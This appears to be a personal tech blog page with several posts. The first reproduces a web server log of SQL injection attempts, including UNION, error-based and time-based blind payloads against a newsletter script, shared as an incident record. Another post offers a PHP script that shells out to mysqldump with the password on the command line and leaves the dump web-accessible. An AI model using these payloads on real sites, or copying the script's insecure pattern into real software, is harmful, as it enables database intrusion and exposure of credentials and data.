176.10.100.229 - - [06/Jun/2014:14:20:28 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:28 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:28 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:29 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:29 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:30 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:30 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:30 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:31 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:31 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:32 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:32 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:33 +0300] "GET /newsletter/index.php?id=41%20and%28select%201%20from%28select%20count%28*%29%2Cconcat%28%28select%20%28select%20concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29%20as%20char%29%29%29%2C0x27%2C0x7e%29%29%20from%20%60information_schema%60.tables%20limit%200%2C1%29%2Cfloor%28rand%280%29*2%29%29x%20from%20%60information_schema%60.tables%20group%20by%20x%29a%29%20and%201%3D1 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:33 +0300] "GET /newsletter/index.php?id=41%20and%28select%201%20from%28select%20count%28*%29%2Cconcat%28%28select%20%28select%20concat%280x7e%2C0x27%2Cdatabase%28%29%2C0x27%2C0x7e%29%29%20from%20%60information_schema%60.tables%20limit%200%2C1%29%2Cfloor%28rand%280%29*2%29%29x%20from%20%60information_schema%60.tables%20group%20by%20x%29a%29%20and%201%3D1 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:34 +0300] "GET /newsletter/index.php?id=convert%28int%2Cdb_name%28%29%29%20and%201%3D1 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:34 +0300] "GET /newsletter/index.php?id=convert%28int%2Cdb_name%28%29%29-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:34 +0300] "GET /newsletter/index.php?id=41%27%20or%201%3Dconvert%28int%2Cdb_name%28%29%29-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:35 +0300] "GET /newsletter/index.php?id=41%3B%20if%20%281%3D1%29%20waitfor%20delay%20%2700%3A00%3A01%27-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:35 +0300] "GET /newsletter/index.php?id=41%27%3B%20if%20%281%3D1%29%20waitfor%20delay%20%2700%3A00%3A01%27-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:36 +0300] "GET /newsletter/index.php?id=41%20and%20if%281%3D1%2CBENCHMARK%281256666%2CMD5%280x41%29%29%2C0%29 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:36 +0300] "GET /newsletter/index.php?id=41%27%20and%20if%281%3D1%2CBENCHMARK%281256666%2CMD5%280x41%29%29%2C0%29%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:37 +0300] "GET /newsletter/index.php?id=41%27%20or%201%3Dconvert%28int%2C%28select%20concat%28version%28%29%2C0x7233646D3076335F73716C5F696E6A656374696F6E%29%29%29-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:37 +0300] "GET /newsletter/index.php?id=41%27%20or%201%3Dconvert%28int%2C%28select%20cast%28Char%28114%29%2bChar%2851%29%2bChar%28100%29%2bChar%28109%29%2bChar%2848%29%2bChar%28118%29%2bChar%2851%29%2bChar%2895%29%2bChar%28104%29%2bChar%28118%29%2bChar%28106%29%2bChar%2895%29%2bChar%28105%29%2bChar%28110%29%2bChar%28106%29%2bChar%28101%29%2bChar%2899%29%2bChar%28116%29%2bChar%28105%29%2bChar%28111%29%2bChar%28110%29%20as%20nvarchar%284000%29%29%29%29-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:38 +0300] "GET /newsletter/index.php?id=41%27%20or%201%3Dconvert%28int%2Cchr%28114%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28109%29%7C%7Cchr%2848%29%7C%7Cchr%28118%29%7C%7Cchr%2851%29%7C%7Cchr%2895%29%7C%7Cchr%28104%29%7C%7Cchr%28118%29%7C%7Cchr%28106%29%7C%7Cchr%2895%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28106%29%7C%7Cchr%28101%29%7C%7Cchr%2899%29%7C%7Cchr%28116%29%7C%7Cchr%28105%29%7C%7Cchr%28111%29%7C%7Cchr%28110%29%29-- HTTP/1.1" 200 284 

Explanation of 0x31303235343830303536 can be found at Site has been hacked via SQL Injection.

In this case it seems we had just attempt to hack as id was not the right place to brute yourself in – there was a check for if (!intval($this->id)) and another parameter was required… but no prepare, just simple queries with slightly sanitized inputs.

Brrrr… must remove all non-cared-for code.

Postitatud rubriiki cybercrime | Kommenteerimine suletud

moving data from MS SQL to MySQL, on OSX

When I have had to move data from Microsoft SQL Server to MySQL I have used MySQL Workbench data migration wizard – well, presumably used, as there has never been enough time to document the process. But as I spent several hours today trying to re-build the setup and ended using RazorSQL (during last 15 minutes)… some notes for future me googling the same problem.

  • MySQL Workbench requires ODBC for connecting to MS SQL, easiest solution on OSX seems to be OpenLink’s ODBC driver which has 2×14 day trial license (simple installation and configuration).
  • BUT apparently MySQL Workbench requires “View Any Definition” rights from db user, missing from hosted solution I had to access. There is a bug report describing the problem and a tutorial video explaining minimal rights, but in my case neither helped.
  • BTW, Oracle user registration – required to comment on bug – seems to be the worst signup I have ever met, doing crazy stuff like replacing repeat password field contents with ***** (yes, 5 asterisks) after moving to next field and unable to accept auto-fill data. (While looking for solution I also started downloading Microsoft SQL Server Express – and had another unforgettable experience being told on Microsoft ID registration that my password is too long, max being 16 chars…).

And with RazorSQL?

  • download trial
  • use bundled JDBC connector
  • create connection
  • select DBO
  • DB Tools -> Database Conversion -> Convert multiple tables

Resulting SQL was pretty importable using PHPMyAdmin – with the exception of some blob fields that had been marked “not null” for no good reason in MS SQL… And need to import data first and then enforce costraints.

Postitatud rubriiki ms sql, mysql | Kommenteerimine suletud

dumping databases, sometimes with forced latin1

This script dates back to when I needed to dump MySQL database accessed by whatever legacy app that decided to connect as latin1 but send data as utf8 – meaning, that dumping it with usual phpMyAdmin (that connects as utf8) resulted in file that failed to properly import. Well, it did import, but the contents were double-utf8’ed … so at least part of the characters were interpreted incorrectly and I spent hours if not days trying to understand why all character conversion libraries completely fail on my input.

So now, whenever I need to dump MySQL database produced by unfriendly application, I do it from command line and twice – as utf8 and latin1, deciding later whichever dump works better. And as it happens FTP access is much easier to get than SSH… and you can find config with SQL access pretty easily… I don’t even bother myself with anything else – I just upload humpty-dump.php, configure some access variables and hit it from the web side (well, I do take care to rename it before uploading and delete it afterwards, just in case you wonder about the security implications :-).

AND, as I sometimes need to grab also database dumps from WordPress installs with only FTP access (and unwilling to bother myself with installing a database-management plugin)… here comes humpty-dump.php:


<?php

// dump database - either using WordPress config from same directory or locally configured parameters
// v 1.2 (2012-11-25) Peeter Marvet, http://tehnokratt.net

if ( is_file( dirname( __FILE__ ) . '/wp-config.php' ) ) {

    include( dirname( __FILE__ ) . '/wp-config.php' );

} else {

    define('DB_NAME', 'name');
    define('DB_USER', 'user');
    define('DB_PASSWORD', 'pass');
    define('DB_HOST', 'localhost');
    define('DB_CHARSET', 'utf8'); // NB! use latin1 on legacy systems that tend to produce unreadable dumps from phpmyadmin!

}

$backupFile = DB_NAME . "_" .date("Y-m-d-H-i-s");
$command = "mysqldump --opt ";

if ( defined ('DB_CHARSET') ) {
    $command .= "--default-character-set=" . DB_CHARSET . " ";
    $backupFile .= "_" . DB_CHARSET;
}

$backupFile .= '.gz';

$command .= "--host=" . DB_HOST . " --user=" . DB_USER . " --password=" . DB_PASSWORD . " " . DB_NAME . " | gzip > $backupFile";

echo "Dumping <strong>" . DB_NAME . "</strong> on <strong>" . DB_HOST . "</strong>... ";

echo system($command);

echo 'Done! Grab it before it rots: <a href="http://' . $_SERVER['SERVER_NAME'] . '/' . $backupFile . '">' . $backupFile . '</a>';

?>

Postitatud rubriiki mysql, php, wordpress | Kommenteerimine suletud

eestikeelne poolitus veebitekstile

Varsti on kõigil brauseritel CSS3 poolituse tugi olemas… aga seniks-kuniks ajab asja ära hyphenator.js mida muuhulgas soovitab Richard Fink artiklis The Look That Says Book. Olen nimelt parajasti tegelemas veebiakadeemia.ee ettevalmistamisega algavaks saatehooajaks ja poolituse puudumine muutis kitsa veeru peal oleva teksti vastikult sakiliseks.

Kiire guugeldamine ei andnud eestikeelse veebipoolituse kohta ühtki tulemust, seega tuli muuhulgas tekitada hyphenator.js jaoks et.js poolitusmuster – aluseks Enn Saare TeX-muster – ning … nii lihtne see oligi :-) Enn lubas tulemuse LGPL alla ning loodetavasti jõuab see varsti ka hyphenator.js ametlikku distributsiooni, seni võib küsida ajutist versiooni minult meilitsi … või pruukida tehnokratt.net/hyphenator/mergeAndPack.html generaatorit.

Kasutuselevõtt on imelihtne:

  • Hyphenatoriga tuleb kaasa mergeAndPack.html mis pakib poolituse, vajalikud keelemoodulid ning seadistused kenasti üheks minimeeritud javascriptiks kokku (olgu siiski lisatud, et mergeAndPack ei tööta otse kettalt avades vaid eeldab turvapõhjustel käitamist veebiserverist – tehnokratt.net/hyphenator/mergeAndPack.html abiks)
  • Linnutad seal soovitavad keeled, vajadusel timmid poolitamise agressiivsust ning lisad klassi mida vaja poolitada (vaikimisi eeldatakse, et lisad poolitamist vajavale sisule klassi hyphenate – minul siin Thematic’u peale tehtud kujunduses sobib entry-content päris hästi); hetkel tasub mitte lubada CSS3 poolituse tuge (bugi on raporteeritud), sest vähemasti Firefox 3.6 kasutajad saavad sellel puhul veateate (võib muidugi ka leppida sellega, et nad peavad lugema poolitamata teksti ning lihtsalt muutma onError funktsiooni {}-ks ehk mitte-veateadet-väljastavaks).
  • Tulemuseks saad teksti mille võid kopeerida nt hyphenator-et.js failiks.
  • WordPressi puhul tasub see sokutada oma kujundusteema kataloogi ning kui lisada functions.php-sse järgmised kaks rida peakski kõik toimima:
wp_register_script( 'hyphenator', ( get_stylesheet_directory_uri() . "/hyphenator-et.js" ), false, '4.0.0' );
wp_enqueue_script( 'hyphenator' );
Postitatud rubriiki usability | Kommenteerimine suletud
  • Viimane veerg

    Mina olen Peeter Marvet (pets@tehnokratt.net). Ei saa täielikult välistada, et see siin oli kunagi minu ajaveeb. Kirjapandu ei pruugi väljendada seisu- ega istmekohti. Seoses surutisega esilehe mahtu vähendatud 8%. Lisandub käibemaks, Tallinna elanikel ka müügi- ja paadimaks. Pakendatud gaasikeskkonda. Valmistatud arvutis milles võib leiduda väheses koguses piima- ja pähklitükke. Ei sisalda hüdrogeenitud (transarasvavabasid) taimseid rasvhappeid, sisaldab vahustatud lämmastikku.